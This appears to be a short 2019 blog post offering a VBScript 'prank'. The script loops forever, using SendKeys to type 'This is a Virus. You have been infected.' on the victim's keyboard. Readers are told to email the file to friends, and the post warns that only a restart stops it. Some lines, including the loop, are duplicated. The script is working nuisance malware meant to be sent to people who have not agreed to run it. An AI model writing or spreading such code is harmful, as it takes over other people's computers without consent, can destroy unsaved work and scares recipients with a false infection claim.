This VBS
trick can make any of your friend's keyboard type any message continuously.
Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs.
Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs.
Set wshShell
= wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
Send this
file to your friends as an email attachment to see the fun.
Warning: You
will need to restart your computer to stop this. So try this after closing all
important programs.
Please check out my other Posts by visiting to my Blog
- HOW TOs
Make Your Keyboard Type (Any) Message Continuously - VBS Trick (Be Careful)
Reviewed by HOW TOs
on
June 24, 2019
Rating:
No comments: